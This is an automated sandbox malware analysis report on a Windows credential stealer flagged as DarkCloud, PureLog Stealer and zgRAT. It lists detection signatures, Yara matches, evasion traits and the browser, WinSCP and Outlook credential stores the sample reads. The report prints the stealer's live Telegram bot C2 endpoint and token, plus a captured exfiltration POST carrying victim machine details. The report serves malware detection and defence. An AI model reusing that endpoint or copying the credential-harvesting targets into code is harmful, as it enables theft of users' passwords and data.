Edit tour

Windows Analysis Report
JFFjXW16yR.exe

Overview

General Information

Sample name:	JFFjXW16yR.exe renamed because original name is a hash value
Original sample name:	d9571b8bc83fb768f27c1a7e0565d16c5ebd9508e4c6d9c15474d2c53df99e93.exe
Analysis ID:	1528942
MD5:	074c4994bc41a053e18c4e5d37e5b62b
SHA1:	47947622d88d6881f85bae692a3d4202f04bcb03
SHA256:	d9571b8bc83fb768f27c1a7e0565d16c5ebd9508e4c6d9c15474d2c53df99e93
Tags:	exeuser-adrian__luca
Infos:

Detection

DarkCloud, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected DarkCloud

Yara detected PureLog Stealer

Yara detected Telegram RAT

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

JFFjXW16yR.exe (PID: 2944 cmdline: "C:\Users\user\Desktop\JFFjXW16yR.exe" MD5: 074C4994BC41A053E18C4E5D37E5B62B)

conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkCloud Stealer	Stealer is written in Visual Basic.	No Attribution	https://asec.ahnlab.com/en/53128/ https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/	https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendMessage"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
JFFjXW16yR.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
JFFjXW16yR.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
JFFjXW16yR.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5799b:$s1: file:/// 0x578ab:$s2: {11111-22222-10009-11112} 0x5792b:$s3: {11111-22222-50001-00000} 0x51c43:$s4: get_Module 0x520dc:$s5: Reverse 0x56f47:$s6: BlockCopy 0x56f85:$s7: ReadByte 0x579ad:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1699400216.0000000000F02000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: JFFjXW16yR.exe PID: 2944	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: JFFjXW16yR.exe PID: 2944	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: JFFjXW16yR.exe PID: 2944	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.JFFjXW16yR.exe.f00000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.JFFjXW16yR.exe.f00000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.JFFjXW16yR.exe.f00000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5799b:$s1: file:/// 0x578ab:$s2: {11111-22222-10009-11112} 0x5792b:$s3: {11111-22222-50001-00000} 0x51c43:$s4: get_Module 0x520dc:$s5: Reverse 0x56f47:$s6: BlockCopy 0x56f85:$s7: ReadByte 0x579ad:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: JFFjXW16yR.exe

Avira: detected

Found malware configuration

Source: JFFjXW16yR.exe.2944.0.memstrmin

Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendMessage"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: JFFjXW16yR.exe

Joe Sandbox ML: detected

Source: JFFjXW16yR.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: JFFjXW16yR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

HTTP traffic detected: POST /bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendDocument?chat_id=6333631912&caption=??%20OC%20verison%20-%20Microsoft%20Windows%20NT%206.2.9200.0%0AMachineName%20-%20767668/user%0ACurrent%20time%20-%2008/10/2024%2007:52:00 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce76e17bd62bdHost: api.telegram.orgContent-Length: 389Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: api.telegram.org

Source: unknown

Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003693000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003663000.00000004.00000800.00020000.00000000.sdmp, JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003679000.00000004.00000800.00020000.00000000.sdmp, JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendDocument?chat_id=6333
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/botE7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5UF/sendDocument?chat_id=G6

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: JFFjXW16yR.exe, type: SAMPLE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen

Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Code function: 0_2_00007FFD9B774776	0_2_00007FFD9B774776
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Code function: 0_2_00007FFD9B773BFB	0_2_00007FFD9B773BFB
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Code function: 0_2_00007FFD9B773FFA	0_2_00007FFD9B773FFA
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Code function: 0_2_00007FFD9B773798	0_2_00007FFD9B773798
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Code function: 0_2_00007FFD9B771570	0_2_00007FFD9B771570
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Code function: 0_2_00007FFD9B771541	0_2_00007FFD9B771541

Source: JFFjXW16yR.exe, 00000000.00000000.1699441650.0000000000F64000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefiremen.exe4 vs JFFjXW16yR.exe
Source: JFFjXW16yR.exe	Binary or memory string: OriginalFilenamefiremen.exe4 vs JFFjXW16yR.exe

Source: JFFjXW16yR.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: JFFjXW16yR.exe, type: SAMPLE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: JFFjXW16yR.exe, fAms6Se0H90iM26npfb.cs	Cryptographic APIs: 'CreateDecryptor'
Source: JFFjXW16yR.exe, fAms6Se0H90iM26npfb.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/4@1/1

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\JFFjXW16yR.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

File created: C:\Users\user\AppData\Local\Temp\tmp18BD.tmp

Jump to behavior

Source: JFFjXW16yR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: JFFjXW16yR.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.000000000352D000.00000004.00000800.00020000.00000000.sdmp, tmp18BD.tmp.dat.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\JFFjXW16yR.exe "C:\Users\user\Desktop\JFFjXW16yR.exe"
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: JFFjXW16yR.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: JFFjXW16yR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: JFFjXW16yR.exe, fAms6Se0H90iM26npfb.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Code function: 0_2_00007FFD9B77C421 push eax; iretd		0_2_00007FFD9B77C42D
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Code function: 0_2_00007FFD9B7700BD pushad ; iretd		0_2_00007FFD9B7700C1

Source: JFFjXW16yR.exe, SQLite.cs	High entropy of concatenated method names: 'GetValue', 'GetRowCount', 'jZQ595ta2', 'YK7Og0iSu', 'ReadTable', 'HB5cdqj5y', 'rM5CVlCjT', 'IRTNlAva6', 'ULSPsqOUP', 'YTUmtab7VIrZgagPPp2'
Source: JFFjXW16yR.exe, Asn1Der.cs	High entropy of concatenated method names: 'Parse', 'SDTVhjq5MuqPcYxE3nI', 'jM2TyfqO7URdecETq9F', 'xW3EAoqcM6yXnDP4PLv', 'z8qkNnqCGqinv8kMOtG', 'lwFF1nqNWpv61t8TkiR', 'rp9lPLq6qabWHDZQ9td', 'AAkHFUq0tpBvfexA0UN'
Source: JFFjXW16yR.exe, Chromium.cs	High entropy of concatenated method names: 'IvWMLRH99LZrCU4EbH9', 'gJBomTHuTbqIUw3Pl6Z', 'vcJNO9HRbq4Wt6B1m7J', 'Dispose', 'SO1IjDHpD5RPhxTdfsd', 'VbJv8aHi4sWvUKAyHCA', 'cQa55QHXX50SvTlCeQ6', 'oM8kBZHYt9IHwrPeYuj', 'RZcYQRH8RioS2QiBUtP', 'uAAjH2HAJH92NSGdesQ'
Source: JFFjXW16yR.exe, Pbkdf2.cs	High entropy of concatenated method names: 'GetBytes', 'oICK3qCDM', 'MFWEaFWiZ', 'StrCredentialsRecovery', 'CiHSOrqZlE53VlOvnqB', 'emW6PUqFSSnG2cFy9qG', 'oUspEsqVaKw9iWV9TeK', 'erPKmfqW3EgMbDqDPKH', 'qYCFokq2j0kHaWXCjRd', 'P8lj9LqfuyiPcvkXUPb'
Source: JFFjXW16yR.exe, Dq2vtoXitgeILmvprM.cs	High entropy of concatenated method names: 'f3kkrRo09', 'itnqnXqJxY5d3OCYaao', 'Tcu37ZqsNwroWxtFy7K', 'qHxJTnqSp2WeeGL4PS6', 'DHdlBQqduyuFvwwGyM2', 'VOyR0WqQTSg5eTlvPQb', 'z615KyqgybZpYdlRxis'
Source: JFFjXW16yR.exe, fAms6Se0H90iM26npfb.cs	High entropy of concatenated method names: 'ak8SGM3lPpdFI5Mffw2', 'oc9lAb3b5eUiYTfTG7A', 'zLLIwRsG5p', 'Xj7DYR36vbcxf2YMX8G', 'MwgmnU304fWOy3c0ahK', 'laH1VZ35LdNlTUalR19', 'ObtqtU3OAoFHeosCRiq', 'KgRLBU3cwBuS8Qst9fo', 'DCr9CG3CmukaQuNKkm1', 'RsYKmV3NsiECwrxw4Ea'
Source: JFFjXW16yR.exe, wkqHS2d1VcVl43Ydy26.cs	High entropy of concatenated method names: 'kVLLB1Elri', 'MAnLoRkxrB', 'qSML1mJu5r', 'VBDLuOcwEa', 'em1LR0k0BA', 'jiTL9q2Sul', 'O51LMKw2Rk', 'YiqQJM0H8P', 'YiHLigHIHM', 'exyLX3shtm'

Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Memory allocated: 16A0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Memory allocated: 1B420000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\JFFjXW16yR.exe TID: 2188	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe TID: 5236	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: JFFjXW16yR.exe, 00000000.00000002.1729630254.000000001BFDA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

Queries volume information: C:\Users\user\Desktop\JFFjXW16yR.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DarkCloud

Source: Yara match	File source: 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JFFjXW16yR.exe PID: 2944, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: JFFjXW16yR.exe, type: SAMPLE
Source: Yara match	File source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1699400216.0000000000F02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JFFjXW16yR.exe PID: 2944, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: JFFjXW16yR.exe, type: SAMPLE
Source: Yara match	File source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\JFFjXW16yR.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\JFFjXW16yR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\Desktop\JFFjXW16yR.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: JFFjXW16yR.exe PID: 2944, type: MEMORYSTR

Remote Access Functionality

Yara detected DarkCloud

Source: Yara match	File source: 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
